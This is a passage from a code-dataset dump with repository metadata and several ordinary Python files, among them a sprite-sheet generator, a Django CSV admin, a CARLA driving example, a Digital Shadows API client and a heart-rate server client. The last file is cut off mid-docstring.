| column | dtype | range |
|---|---|---|
| hexsha | stringlengths | 40-40 |
| size | int64 | 5-2.06M |
| ext | stringclasses | 10 values |
| lang | stringclasses | 1 value |
| max_stars_repo_path | stringlengths | 3-248 |
| max_stars_repo_name | stringlengths | 5-125 |
| max_stars_repo_head_hexsha | stringlengths | 40-78 |
| max_stars_repo_licenses | listlengths | 1-10 |
| max_stars_count | int64 | 1-191k ⌀ |
| max_stars_repo_stars_event_min_datetime | stringlengths | 24-24 ⌀ |
| max_stars_repo_stars_event_max_datetime | stringlengths | 24-24 ⌀ |
| max_issues_repo_path | stringlengths | 3-248 |
| max_issues_repo_name | stringlengths | 5-125 |
| max_issues_repo_head_hexsha | stringlengths | 40-78 |
| max_issues_repo_licenses | listlengths | 1-10 |
| max_issues_count | int64 | 1-67k ⌀ |
| max_issues_repo_issues_event_min_datetime | stringlengths | 24-24 ⌀ |
| max_issues_repo_issues_event_max_datetime | stringlengths | 24-24 ⌀ |
| max_forks_repo_path | stringlengths | 3-248 |
| max_forks_repo_name | stringlengths | 5-125 |
| max_forks_repo_head_hexsha | stringlengths | 40-78 |
| max_forks_repo_licenses | listlengths | 1-10 |
| max_forks_count | int64 | 1-105k ⌀ |
| max_forks_repo_forks_event_min_datetime | stringlengths | 24-24 ⌀ |
| max_forks_repo_forks_event_max_datetime | stringlengths | 24-24 ⌀ |
| content | stringlengths | 5-2.06M |
| avg_line_length | float64 | 1-1.02M |
| max_line_length | int64 | 3-1.03M |
| alphanum_fraction | float64 | 0-1 |
| count_classes | int64 | 0-1.6M |
| score_classes | float64 | 0-1 |
| count_generators | int64 | 0-651k |
| score_generators | float64 | 0-1 |
| count_decorators | int64 | 0-990k |
| score_decorators | float64 | 0-1 |
| count_async_functions | int64 | 0-235k |
| score_async_functions | float64 | 0-1 |
| count_documentation | int64 | 0-1.04M |
| score_documentation | float64 | 0-1 |
hexsha: a1d14e136fc6ab73bd62946ee36b52f8b5423c8b | size: 1,001 | ext: py | lang: Python
max_stars_repo: util/format_ldtk_battlers.py | Sipondo/ulix-dexflow | de46482fe08e3d600dd5da581f0524b55e5df961 | ["MIT"] | stars: 5 | 2021-06-25T16:44:38.000Z | 2021-12-31T01:29:00.000Z
max_issues_repo: util/format_ldtk_battlers.py | Sipondo/ulix-dexflow | de46482fe08e3d600dd5da581f0524b55e5df961 | ["MIT"] | issues: null | null | null
max_forks_repo: util/format_ldtk_battlers.py | Sipondo/ulix-dexflow | de46482fe08e3d600dd5da581f0524b55e5df961 | ["MIT"] | forks: 1 | 2021-06-25T20:33:47.000Z | 2021-06-25T20:33:47.000Z
content:
from pathlib import Path
import os
from PIL import Image, ImageFont, ImageDraw
import numpy as np
import pandas as pd
from math import *

p = Path("resources/graphics/Pokemon/Icons")
df = pd.read_csv(Path("resources/PBS/compressed/pokemon.csv"), index_col=0)

width = 64
height = ceil(len(df) / 64)

canvas = Image.new("RGBA", (width, height), "#00000000")
draw = ImageDraw.Draw(canvas)

for i, row in df.iterrows():
    try:
        img = (
            Image.open(p / f"{row.internalname}.png")
            .convert("RGBA")
            .resize((64, 32), resample=Image.NEAREST)
            .crop((0, 0, 32, 32))
        )
        canvas.alpha_composite(img, ((i % 64) * 32, (i // 64) * 32))
    except Exception as e:
        continue

canvas.save(Path("resources/graphics/generated/battler_ldtk_list.png"))

# for pth in p.glob("*.png"):
#     img = (
#         Image.open(pth)
#         .convert("RGBA")
#         .resize((64, 32), resample=Image.NEAREST)
#         .crop((0, 0, 32, 32))
#     )
avg_line_length: 25.025 | max_line_length: 75 | alphanum_fraction: 0.592408
count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0
count_async_functions: 0 | score_async_functions: 0 | count_documentation: 354 | score_documentation: 0.353646
hexsha: a1d3d2bbc91fe562ff03d1024258dfe9a2092f42 | size: 4,237 | ext: py | lang: Python
max_stars_repo: main/admin.py | japmeet01/fplmanager-website | c7a533f49acb04ee56876dff8759bb68468b0592 | ["MIT"] | stars: 5 | 2020-02-07T23:24:05.000Z | 2021-07-23T23:37:41.000Z
max_issues_repo: main/admin.py | japmeet01/fplmanager-website | c7a533f49acb04ee56876dff8759bb68468b0592 | ["MIT"] | issues: 11 | 2020-01-13T10:02:33.000Z | 2022-02-10T14:42:36.000Z
max_forks_repo: main/admin.py | japmeet01/fplmanager-website | c7a533f49acb04ee56876dff8759bb68468b0592 | ["MIT"] | forks: 11 | 2020-02-07T23:24:09.000Z | 2020-10-16T14:57:54.000Z
content:
from django.contrib import admin
from django.http import HttpResponse
from django.urls import path
from django.shortcuts import render, HttpResponse, redirect
from django import forms
import os
import csv
from io import TextIOWrapper, StringIO

from .models import Player, Team, Usage, XgLookup


class CsvImportForm(forms.Form):
    csv_file = forms.FileField()


class NoLoggingMixin:
    def log_addition(self, *args):
        return

    def log_change(self, *args):
        return

    def log_deletion(self, *args):
        return


class ExportCsvMixin:
    def export_as_csv(self, request, queryset):
        meta = self.model._meta
        field_names = [field.name for field in meta.fields]
        response = HttpResponse(content_type='text/csv')
        response['Content-Disposition'] = 'attachment; filename={}.csv'.format(meta)
        writer = csv.writer(response)
        writer.writerow(field_names)
        for obj in queryset:
            row = writer.writerow([getattr(obj, field) for field in field_names])
        return response

    def export_delete_as_csv(self, request, queryset):
        meta = self.model._meta
        field_names = [field.name for field in meta.fields]
        response = HttpResponse(content_type='text/csv')
        response['Content-Disposition'] = 'attachment; filename={}.csv'.format(meta)
        writer = csv.writer(response)
        writer.writerow(field_names)
        for obj in queryset:
            row = writer.writerow([getattr(obj, field) for field in field_names])
            obj.delete()
        return response

    export_as_csv.short_description = "Export Selected"
    export_delete_as_csv.short_description = "Export and Delete Selected"


class UploadCsvMixin:
    def get_urls(self):
        urls = super().get_urls()
        my_urls = [
            path('import-csv/', self.import_csv)
        ]
        return my_urls + urls

    def import_csv(self, request):
        if request.method == 'POST':
            csv_file = TextIOWrapper(request.FILES['csv_file'].file, encoding=request.encoding)
            extension = os.path.splitext(request.FILES['csv_file'].name)[1]
            if extension == '.csv':
                reader = csv.reader(csv_file)
                headers = next(reader)
                model_fields = [m.name for m in self.model._meta.fields if m.name != 'updated']
                # if set(headers) == set(model_fields):
                input_data = [dict(zip(headers, row)) for row in reader]
                for i in input_data:
                    t = self.model()
                    [setattr(t, k, v) for k, v in i.items()]
                    t.save()
                # else:
                #     self.message_user(request, "Bad headers - unable to import selected file. Expected headers: '{expected}' Received headers: '{actual}'".format(
                #         expected=model_fields,
                #         actual=headers
                #     ), level='ERROR')
                #     return redirect("..")
            else:
                self.message_user(request, 'Incorrect file type', level='ERROR')
                return redirect('..')
            self.message_user(request, "Your csv file has been imported")
            return redirect("..")
        form = CsvImportForm()
        payload = {"form": form}
        return render(
            request, "custom_admin/csv_form.html", payload
        )


@admin.register(Player)
class PlayerAdmin(NoLoggingMixin, ExportCsvMixin, admin.ModelAdmin):
    readonly_fields = ('updated',)
    actions = ['export_as_csv']


@admin.register(Team)
class TeamAdmin(NoLoggingMixin, ExportCsvMixin, admin.ModelAdmin):
    readonly_fields = ('updated',)
    actions = ['export_as_csv']


@admin.register(Usage)
class UsageAdmin(NoLoggingMixin, ExportCsvMixin, admin.ModelAdmin):
    readonly_fields = ('updated',)
    actions = ['export_as_csv', 'export_delete_as_csv']


@admin.register(XgLookup)
class XgLookupAdmin(NoLoggingMixin, UploadCsvMixin, ExportCsvMixin, admin.ModelAdmin):
    change_list_template = 'custom_admin/models_changelist.html'
    readonly_fields = ('updated',)
    actions = ['export_as_csv']
avg_line_length: 31.619403 | max_line_length: 164 | alphanum_fraction: 0.618126
count_classes: 3,829 | score_classes: 0.903705 | count_generators: 0 | score_generators: 0 | count_decorators: 739 | score_decorators: 0.174416
count_async_functions: 0 | score_async_functions: 0 | count_documentation: 777 | score_documentation: 0.183384
hexsha: a1d4680a92b1711d0003c4bd4a72a28789727f68 | size: 221 | ext: py | lang: Python
max_stars_repo: Muta3DMaps/core/__init__.py | NatureGeorge/SIFTS_Plus_Muta_Maps | 60f84e6024508e65ee3791103762b95666d3c646 | ["MIT"] | stars: null | null | null
max_issues_repo: Muta3DMaps/core/__init__.py | NatureGeorge/SIFTS_Plus_Muta_Maps | 60f84e6024508e65ee3791103762b95666d3c646 | ["MIT"] | issues: null | null | null
max_forks_repo: Muta3DMaps/core/__init__.py | NatureGeorge/SIFTS_Plus_Muta_Maps | 60f84e6024508e65ee3791103762b95666d3c646 | ["MIT"] | forks: null | null | null
content:
# @Created Date: 2019-11-24 09:07:07 pm
# @Filename: __init__.py
# @Email: 1730416009@stu.suda.edu.cn
# @Author: ZeFeng Zhu
# @Last Modified: 2019-12-23 04:23:51 pm
# @Copyright (c) 2019 MinghuiGroup, Soochow University
avg_line_length: 31.571429 | max_line_length: 54 | alphanum_fraction: 0.714932
count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0
count_async_functions: 0 | score_async_functions: 0 | count_documentation: 215 | score_documentation: 0.972851
hexsha: a1d5ed8760ff10427163bf99b2b4a26de7553293 | size: 3,217 | ext: py | lang: Python
max_stars_repo: tests/test_utils/test_file.py | dcambie/spectrochempy | e376082d66be7a4c528b7d83be076d77534e39bd | ["CECILL-B"] | stars: 3 | 2021-04-09T09:13:21.000Z | 2022-01-09T00:05:42.000Z
max_issues_repo: tests/test_utils/test_file.py | fernandezc/spectrochempy | 4707c51dba0032c160afc40682fa16d4b9855ded | ["CECILL-B"] | issues: null | null | null
max_forks_repo: tests/test_utils/test_file.py | fernandezc/spectrochempy | 4707c51dba0032c160afc40682fa16d4b9855ded | ["CECILL-B"] | forks: null | null | null
content:
# -*- coding: utf-8 -*-
# =====================================================================================================================
# Copyright (©) 2015-2021 LCS - Laboratoire Catalyse et Spectrochimie, Caen, France. =
# CeCILL-B FREE SOFTWARE LICENSE AGREEMENT - See full LICENSE agreement in the root directory =
# =====================================================================================================================
#
# ======================================================================================================================
# Copyright (©) 2015-2021 LCS - Laboratoire Catalyse et Spectrochimie, Caen, France. =
# CeCILL-B FREE SOFTWARE LICENSE AGREEMENT - See full LICENSE agreement in the root directory =
# ======================================================================================================================
from pathlib import Path
from os import environ
from os.path import join

import pytest

from spectrochempy.core import preferences as prefs
from spectrochempy import NO_DISPLAY
from spectrochempy.utils import get_filename


def test_get_filename():
    # should read in the default prefs.datadir (and for testing we fix the name to environ['TEST_FILE']
    f = get_filename(filetypes=["OMNIC files (*.spg *.spa *.srs)",
                                "SpectroChemPy files (*.scp)"])
    assert isinstance(f, dict)

    f = get_filename(filetypes=["OMNIC files (*.spg *.spa *.srs)",
                                "SpectroChemPy files (*.scp)"],
                     dictionary=False)
    assert isinstance(f, list)
    assert isinstance(f[0], Path)
    if NO_DISPLAY:
        assert str(f[0]) == join(prefs.datadir, environ['TEST_FILE'])

    # directory specified by a keyword as well as the filename
    f = get_filename("nh4y-activation.spg", directory="irdata")
    assert f == {
        '.spg': [Path(prefs.datadir) / 'irdata' / 'nh4y-activation.spg']
    }

    # directory specified in the filename as a subpath of the data directory
    f = get_filename("irdata/nh4y-activation.spg")
    assert f == {
        '.spg': [Path(prefs.datadir) / 'irdata' / 'nh4y-activation.spg']
    }

    # no directory specified (filename must be in the working or the default data directory
    f = get_filename("wodger.spg")

    # if it is not found an error is generated
    with pytest.raises(IOError):
        f = get_filename("nh4y-activation.spg")

    # directory is implicit (we get every files inside, with an allowed extension)
    # WARNING: Must end with a backslash
    f = get_filename("irdata/",
                     filetypes=['OMNIC files (*.spa, *.spg)', 'OMNIC series (*.srs)', 'all files (*.*)'],
                     listdir=True)
    if '.scp' in f.keys():
        del f['.scp']
    assert len(f.keys()) == 2

    # should raise an error
    with pytest.raises(IOError):
        get_filename("~/xxxx",
                     filetypes=["OMNIC files (*.sp*)",
                                "SpectroChemPy files (*.scp)",
                                "all files (*)"])

# EOF
avg_line_length: 42.893333 | max_line_length: 120 | alphanum_fraction: 0.500155
count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0
count_async_functions: 0 | score_async_functions: 0 | count_documentation: 1,944 | score_documentation: 0.603914
hexsha: a1d778137bf41265c501edad6184cfc3fae9a1be | size: 1,450 | ext: py | lang: Python
max_stars_repo: toontown/safezone/ETreasurePlannerAI.py | SuperM0use24/TT-CL-Edition | fdad8394f0656ae122b687d603f72afafd220c65 | ["MIT"] | stars: null | null | null
max_issues_repo: toontown/safezone/ETreasurePlannerAI.py | SuperM0use24/TT-CL-Edition | fdad8394f0656ae122b687d603f72afafd220c65 | ["MIT"] | issues: 1 | 2021-06-08T17:16:48.000Z | 2021-06-08T17:16:48.000Z
max_forks_repo: toontown/safezone/ETreasurePlannerAI.py | SuperM0use24/TT-CL-Edition | fdad8394f0656ae122b687d603f72afafd220c65 | ["MIT"] | forks: 3 | 2021-06-03T05:36:36.000Z | 2021-06-22T15:07:31.000Z
content:
from toontown.safezone.DistributedETreasureAI import DistributedETreasureAI
from toontown.safezone.RegenTreasurePlannerAI import RegenTreasurePlannerAI


class ETreasurePlannerAI(RegenTreasurePlannerAI):
    def __init__(self, zoneId):
        self.healAmount = 2
        self.spawnPoints = []
        RegenTreasurePlannerAI.__init__(self, zoneId, DistributedETreasureAI, 'ETreasurePlanner', 15, 3)

    def initSpawnPoints(self):
        self.spawnPoints = [(19, -171, 0.0),
                            (-3, -100, 3.66),
                            (-4, -25, 7.0),
                            (1.15, 64.89, 4.858),
                            (-89, 43.4, 0.0),
                            (-114, -5, 1.8),
                            (-106, -98, 0.0),
                            (-1, -61, 1.0),
                            (130, 30, 0.0),
                            (-21, -7, 7.0),
                            (-27, 91, 0.0),
                            (-57, 0, 2.7),
                            (12, -128, -9.97),
                            (-1.8, 103.4, -8.0),
                            (-27.5, 6, -9.2),
                            (-29.6, -34.4, -5.4),
                            (-163.7, 13.8, 0.9),
                            (1.3, -107, 7.9),
                            (-87, -49, 0.05),
                            (45, 2.6, 8.0)]
        return self.spawnPoints

    def validAvatar(self, av):
        return 0 < av.hp < av.maxHp
avg_line_length: 39.189189 | max_line_length: 104 | alphanum_fraction: 0.37931
count_classes: 1,295 | score_classes: 0.893103 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0
count_async_functions: 0 | score_async_functions: 0 | count_documentation: 18 | score_documentation: 0.012414
hexsha: a1da8b92dc0cdcfd459c2434f84a887452586f81 | size: 2,204 | ext: py | lang: Python
max_stars_repo: user_roles/role_add.py | PaloAltoNetworks/pcs-migration-management | 766c8c861befa92e593b23ad6d248e33f62054bb | ["ISC"] | stars: 1 | 2022-03-17T12:51:45.000Z | 2022-03-17T12:51:45.000Z
max_issues_repo: user_roles/role_add.py | PaloAltoNetworks/pcs-migration-management | 766c8c861befa92e593b23ad6d248e33f62054bb | ["ISC"] | issues: 2 | 2021-11-03T15:34:40.000Z | 2021-12-14T19:50:20.000Z
max_forks_repo: user_roles/role_add.py | PaloAltoNetworks/pcs-migration-management | 766c8c861befa92e593b23ad6d248e33f62054bb | ["ISC"] | forks: 4 | 2021-11-09T17:57:01.000Z | 2022-01-24T17:41:21.000Z
content:
from sdk.color_print import c_print
from user_roles import role_translate_id
from tqdm import tqdm


def add_roles(session, old_session, roles, logger):
    added = 0
    tenant_name = session.tenant
    if roles:
        logger.info(f'Adding User Roles to tenant: \'{tenant_name}\'')

        # Translate Acc Grp IDs
        logger.debug('API - Getting source Account Groups')
        src_acc_grps = old_session.request('GET', '/cloud/group').json()
        logger.debug('API - Getting destination Account Groups')
        dest_acc_grps = session.request('GET', '/cloud/group').json()

        # Translate Resource List IDs
        logger.debug('API - Getting source Resource Lists')
        src_rsc_lists = old_session.request('GET', '/v1/resource_list').json()
        logger.debug('API - Getting destination Resource Lists')
        dest_rsc_lists = session.request('GET', '/v1/resource_list').json()

        for role in tqdm(roles, desc='Adding User Roles', leave=False):
            # Translate Acc Grp IDs
            if 'accountGroupIds' in role:
                new_ids = []
                for index in range(len(role['accountGroupIds'])):
                    old_id = role['accountGroupIds'][index]
                    new_id = role_translate_id.translate_acc_grp_ids(old_id, dest_acc_grps, src_acc_grps)
                    new_ids.append(new_id)
                role.update(accountGroupIds=new_ids)

            # Translate resource List IDS
            if 'resourceListIds' in role:
                new_ids = []
                for index in range(len(role['resourceListIds'])):
                    old_id = role['resourceListIds'][index]
                    new_id = role_translate_id.translate_rsc_list_ids(old_id, dest_rsc_lists, src_rsc_lists)
                    new_ids.append(new_id)
                role.update(resourceListIds=new_ids)

            name = role['name']
            logger.debug(f'API - Adding role: {name}')
            res = session.request('POST', '/user/role', json=role)
            if res.status_code == 200 or res.status_code == 201:
                added += 1
    else:
        logger.info(f'No User Roles to add for tenant: \'{tenant_name}\'')

    return added
avg_line_length: 42.384615 | max_line_length: 108 | alphanum_fraction: 0.606624
count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0
count_async_functions: 0 | score_async_functions: 0 | count_documentation: 619 | score_documentation: 0.280853
hexsha: a1dabed16e80b17dead966e6cd7f52d07e673b7f | size: 6,641 | ext: py | lang: Python
max_stars_repo: Apps/phdigitalshadows/dsapi/service/ds_base_service.py | ryanbsaunders/phantom-apps | 1befda793a08d366fbd443894f993efb1baf9635 | ["Apache-2.0"] | stars: 74 | 2019-10-22T02:00:53.000Z | 2022-03-15T12:56:13.000Z
max_issues_repo: Apps/phdigitalshadows/dsapi/service/ds_base_service.py | ryanbsaunders/phantom-apps | 1befda793a08d366fbd443894f993efb1baf9635 | ["Apache-2.0"] | issues: 375 | 2019-10-22T20:53:50.000Z | 2021-11-09T21:28:43.000Z
max_forks_repo: Apps/phdigitalshadows/dsapi/service/ds_base_service.py | ryanbsaunders/phantom-apps | 1befda793a08d366fbd443894f993efb1baf9635 | ["Apache-2.0"] | forks: 175 | 2019-10-23T15:30:42.000Z | 2021-11-05T21:33:31.000Z
content:
# File: ds_base_service.py
#
# Licensed under Apache 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt)
#
import json
import time
import base64
from functools import wraps

from ..config import ds_api_host, ds_api_base
from .ds_abstract_service import DSAbstractService


class DSBaseService(DSAbstractService):
    """
    Base Service that implements common operations for all DS services.
    """

    def __init__(self, ds_api_key, ds_api_secret_key, proxy=None):
        super(DSBaseService, self).__init__(proxy=proxy)
        data_string = str(ds_api_key) + ":" + str(ds_api_secret_key)
        data_bytes = data_string.encode("ascii")
        data_bytes = base64.b64encode(data_bytes)
        self._hash = data_bytes.decode("ascii")
        self._url_base = '{}{}'.format(ds_api_host, ds_api_base)

    def _headers(self, with_content_type=True):
        headers = {
            'Authorization': 'Basic {}'.format(self._hash),
        }
        if with_content_type:
            headers['Content-Type'] = 'application/json'
        return headers

    def _request(self, path, method='GET', body=None, headers=None):
        """
        Send a request to the Digital Shadows API.
        :param path: API endpoint path, does not require host. eg. /api/session-user
        :param method:
        :param body:
        :param headers:
        :return: tuple(response, content)
        """
        url = '{}{}'.format(self._url_base, path)
        headers = self._headers() if headers is None else headers
        response, content = super(DSBaseService, self)._request(url,
                                                                method=method,
                                                                body=str(body).replace("'", '"'),
                                                                headers=headers)
        if int(response['status']) == 200:
            return json.loads(content)
        else:
            raise RuntimeError('{} responded with status code {}'.format(url, response['status']))

    def _request_post(self, path, method='POST', body=None, headers=None):
        """
        Send a request to the Digital Shadows API.
        :param path: API endpoint path, does not require host. eg. /api/session-user
        :param method:
        :param body:
        :param headers:
        :return: tuple(response, content)
        """
        url = '{}{}'.format(self._url_base, path)
        headers = self._headers() if headers is None else headers
        response, content = super(DSBaseService, self)._request(url,
                                                                method=method,
                                                                body=str(body).replace("'", '"'),
                                                                headers=headers)
        if int(response['status']) in (200, 204):
            if content != "":
                res_text = json.loads(content)
            else:
                res_text = ""
            post_response = {
                'status': response['status'],
                'message': 'SUCCESS',
                'content': []
            }
            post_response['content'].append(res_text)
            return post_response
        else:
            raise RuntimeError('{} responded with status code {}'.format(url, response['status']))

    def _scrolling_request(self, path, method='GET', body=None, headers=None):
        """
        Scrolls through a paginated response from the Digital Shadows API.
        :param path: API endpoint path, does not require host. eg. /api/session-user
        :param method:
        :param body: View object - requires pagination field, see DSBaseService.paginated decorator
        :return: tuple(response, content)
        """
        assert 'pagination' in body
        paginated_view = body
        url = '{}{}'.format(self._url_base, path)
        headers = self._headers() if headers is None else headers
        scrolling = True
        while scrolling:
            response, content = super(DSBaseService, self)._request(url,
                                                                    method,
                                                                    body=str(paginated_view).replace("'", '"'),
                                                                    headers=headers)
            if int(response['status']) == 200:
                data = json.loads(content)
                offset = data['currentPage']['offset']
                size = data['currentPage']['size']
                total = data['total']
                if offset + size < total:
                    paginated_view['pagination']['offset'] = offset + size
                else:
                    scrolling = False
                yield data
            elif int(response['status']) == 429:
                # rate limited, wait before resuming scroll requests
                time.sleep(1)
            else:
                scrolling = False

    def valid_credentials(self):
        """
        Checks if the provided Digital Shadows credentials are valid.
        :return: bool
        """
        path = '/api/session-user'
        url = '{}{}'.format(self._url_base, path)
        response, content = super(DSBaseService, self)._request(url,
                                                                headers=self._headers(with_content_type=False))
        return int(response['status']) == 200

    @staticmethod
    def paginated(offset=0, size=500):
        def paginated_decorator(view_function):
            @wraps(view_function)
            def view_wrapper(*args, **kwargs):
                pagination = {
                    'pagination': {
                        'offset': offset,
                        'size': size
                    }
                }
                view = view_function(*args, **kwargs)
                pagination.update(view)
                return pagination
            return view_wrapper
        return paginated_decorator

    @staticmethod
    def sorted(sort_property, reverse=False):
        def sorted_decorator(view_function):
            @wraps(view_function)
            def view_wrapper(*args, **kwargs):
                sort = {
                    'sort': {
                        'property': sort_property,
                        'direction': "ASCENDING" if reverse else "DESCENDING"
                    }
                }
                view = view_function(*args, **kwargs)
                sort.update(view)
                return sort
            return view_wrapper
        return sorted_decorator
avg_line_length: 38.166667 | max_line_length: 111 | alphanum_fraction: 0.511971
count_classes: 6,362 | score_classes: 0.957988 | count_generators: 1,642 | score_generators: 0.247252 | count_decorators: 1,151 | score_decorators: 0.173317
count_async_functions: 0 | score_async_functions: 0 | count_documentation: 1,705 | score_documentation: 0.256738
hexsha: a1dac102f27e519bf75cf582e4948e7c1ea1984f | size: 4,216 | ext: py | lang: Python
max_stars_repo: examples/motion_planning.py | luisgaboardi/Motion-Planning-Carla-Simulator | 4270fd3b7e488876a8ac249c217a7fb219e8d27b | ["MIT"] | stars: null | null | null
max_issues_repo: examples/motion_planning.py | luisgaboardi/Motion-Planning-Carla-Simulator | 4270fd3b7e488876a8ac249c217a7fb219e8d27b | ["MIT"] | issues: 4 | 2021-05-13T11:33:06.000Z | 2022-02-08T06:26:55.000Z
max_forks_repo: examples/motion_planning.py | luisgaboardi/Motion-Planning-Carla-Simulator | 4270fd3b7e488876a8ac249c217a7fb219e8d27b | ["MIT"] | forks: null | null | null
content:
# Imports for Carla
import glob
import os
import sys

try:
    sys.path.append(glob.glob('../carla/dist/carla-*%d.%d-%s.egg' % (
        sys.version_info.major,
        sys.version_info.minor,
        'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])
except IndexError:
    pass

import carla

try:
    sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))) + '/carla')
except IndexError:
    pass

from agents.navigation.unb_agent import Agent

"""
This script implements a few autonomous-vehicle modules:
    - PID controllers for longitudinal and lateral control
    - Dynamic route changes based on the signal from an obstacle sensor
      mounted on the front of the vehicle.
With this, the vehicle leaves a starting point, avoids two obstacles by
changing lanes and, on detecting a red traffic light, stops before the intersection
"""


def main():
    actor_list = []
    try:
        # Connect the client to the simulation
        client = carla.Client('localhost', 2000)
        client.set_timeout(10.0)

        # Configure the simulation through the client
        world = client.get_world()
        _map = world.get_map()
        settings = world.get_settings()

        """
        In the synchronous mode configured below, the server waits for a "tick"
        from the client, i.e. a "ready to proceed" message, before advancing to
        the next simulation step. In practice, this means the simulation waits
        for the client's computations before moving on.
        """
        settings.synchronous_mode = True

        """
        The setting below defines a fixed interval between simulation steps.
        If set to 0.022, there will be approximately 45 frames per simulated second
        """
        settings.fixed_delta_seconds = 0.022
        world.apply_settings(settings)

        # Spawn the ego vehicle and choose the destination point
        blueprint_library = world.get_blueprint_library()
        vehicle_bp = blueprint_library.filter('bmw')[0]
        spawn_point = _map.get_spawn_points()[64]
        destination_point = _map.get_spawn_points()[31]
        vehicle = world.spawn_actor(vehicle_bp, spawn_point)
        actor_list.append(vehicle)
        world.tick()

        # Spawn the first obstacle
        obstacle_bp = blueprint_library.filter('vehicle.audi.a2')[0]
        obstacle_spawn_point = _map.get_spawn_points()[62]
        obstacle = world.spawn_actor(obstacle_bp, obstacle_spawn_point)
        actor_list.append(obstacle)

        # Spawn the second obstacle
        obstacle_spawn_point = carla.Transform(carla.Location(x=-88.056326, y=-48.930733, z=0.930733), carla.Rotation(pitch=0.000000, yaw=89.787674, roll=0.000000))
        obstacle2 = world.spawn_actor(obstacle_bp, obstacle_spawn_point)
        actor_list.append(obstacle2)
        world.tick()

        # Create the agent and attach it to the ego vehicle
        agent = Agent(vehicle, ignore_traffic_light=False)
        actor_list.append(agent._camera)
        actor_list.append(agent.obstacle_sensor)

        # Generate the route
        agent.set_route(spawn_point.location, destination_point.location)

        # Game loop
        while not agent.arrived():
            world.tick()
            world.get_spectator().set_transform(agent._camera.get_transform())

            # Generate the control command for the vehicle
            control = agent.run_step(speed=(vehicle.get_speed_limit())) or agent.emergency_stop()
            vehicle.apply_control(control)

            # Route visualization
            agent.show_path(distance=int(agent.get_speed(vehicle)/2))

    finally:
        print("Destino alcançado!")
        print('Destruindo Atores')

        # Stop active sensors since they do not stop automatically at the end of execution
        agent.obstacle_sensor.stop()
        client.apply_batch([carla.command.DestroyActor(x) for x in actor_list])
        print('Done.')
        world.tick()

        # Disable synchronous mode to allow moving the spectator view
        settings.synchronous_mode = False
        world.apply_settings(settings)


if __name__ == '__main__':
    main()
avg_line_length: 36.344828 | max_line_length: 164 | alphanum_fraction: 0.671015
count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0
count_async_functions: 0 | score_async_functions: 0 | count_documentation: 1,645 | score_documentation: 0.385788
hexsha: a1dad65039164684afc4c0a9e16a88052f3e201e | size: 5,705 | ext: py | lang: Python
max_stars_repo: hr_api.py | AznStevy/heart_rate_sentinel_server | e241ee705221be643a3c3773a2e5ed9c129c733f | ["MIT"] | stars: null | null | null
max_issues_repo: hr_api.py | AznStevy/heart_rate_sentinel_server | e241ee705221be643a3c3773a2e5ed9c129c733f | ["MIT"] | issues: 4 | 2018-11-13T20:44:50.000Z | 2018-11-16T19:47:09.000Z
max_forks_repo: hr_api.py | AznStevy/heart_rate_sentinel_server | e241ee705221be643a3c3773a2e5ed9c129c733f | ["MIT"] | forks: null | null | null
content:
import json

import requests

post_url = "http://127.0.0.1:5000/api/"


# ---------- general web interfacing ----------------------
def post(endpoint, payload, uri="http://127.0.0.1:5000/api/"):
    """
    Posts to the flask web server.
    Args:
        endpoint: The endpoint of the API
        payload: Payload according to what the web server requires.
        uri: Web server uri.
    Returns:
        object: Response from web server.
    """
    return requests.post(uri + endpoint, json=payload)


def get(endpoint, uri="http://127.0.0.1:5000/api/"):
    """
    Gets from the flask web server.
    Args:
        endpoint: The endpoint of the API
        uri: Web server uri.
    Returns:
        object: Response from web server.
    """
    return requests.get(uri + endpoint)


# ---------- API ----------------------
def get_all_patients():
    """
    Obtains a list of all patients in the database. (For testing)
    Returns:
        dict: All patients currently in database referenced by ID.
    """
    resp = get("all_patients")
    return byte_2_json(resp)


def add_new_patient(patient_id: str, attending_email: str, user_age: int):
    """
    Adds new patient to the database.
    Args:
        patient_id: ID of the patient.
        attending_email: Email of the user
        user_age: Age of the user.
    Returns:
        dict: Patient that added.
    """
    payload = {
        "patient_id": patient_id,
        "attending_email": attending_email,
        "user_age": user_age
    }
    resp = post("new_patient", payload)
    return byte_2_json(resp)


def get_interval_average(patient_id: str, timestamp: str):
    """
    Gets the average heart rate from before a timestamp.
    Args:
        patient_id: ID of the patient.
        timestamp: timestamp in form YYYY-MM-DD HH:MM:SS.#######
    Returns:
        float: Average heart rate from before the timestamp.
    """
    payload = {
        "patient_id": patient_id,
        "heart_rate_average_since": timestamp,
    }
    resp = post("heart_rate/interval_average", payload)
    return byte_2_json(resp)


def post_heart_rate(patient_id: str, heart_rate: int):
    """
    Posts a heart rate to a patient. Timestamp automatically generated.
    Args:
        patient_id: ID of the patient.
        heart_rate: Heart rate to post.
    Returns:
        dict: Updated patient information.
    """
    payload = {
        "patient_id": patient_id,
        "heart_rate": heart_rate,
    }
    resp = post("heart_rate", payload)
    return byte_2_json(resp)


def get_patient_status(patient_id: str):
    """
    Obtains patient status. Sends email if tachychardic.
    Args:
        patient_id: ID of the patient.
    Returns:
        tuple: first is if tachychardic, second is timestamp.
    """
    resp = get("status/{}".format(patient_id))
    return byte_2_json(resp)


def get_heart_rate(patient_id: str):
    """
    Obtains all heart rates from the
    Args:
        patient_id: ID of the patient.
    Returns:
        list: List of all heart rates from the patient.
    """
    resp = get("heart_rate/{}".format(patient_id))
    return byte_2_json(resp)


def get_heart_rate_average(patient_id: str):
    """
    Obtains an average heart rate of the patient.
    Args:
        patient_id: ID of the patient.
    Returns:
        float: Average heart rate of the patient.
    """
    resp = get("heart_rate/average/{}".format(patient_id))
    return byte_2_json(resp)


def byte_2_json(resp):
    """
    Converts bytes to json. Raises exception if necessary.
    Args:
        resp (bytes): Response from request.
    Returns:
        dict: Json object of interest.
    """
    json_resp = json.loads(resp.content.decode('utf-8'))
    json_resp = error_catcher(json_resp)
    return json_resp


def error_catcher(json_resp: dict):
    """
    Raises appropriate exceptions from the web server.
    Args:
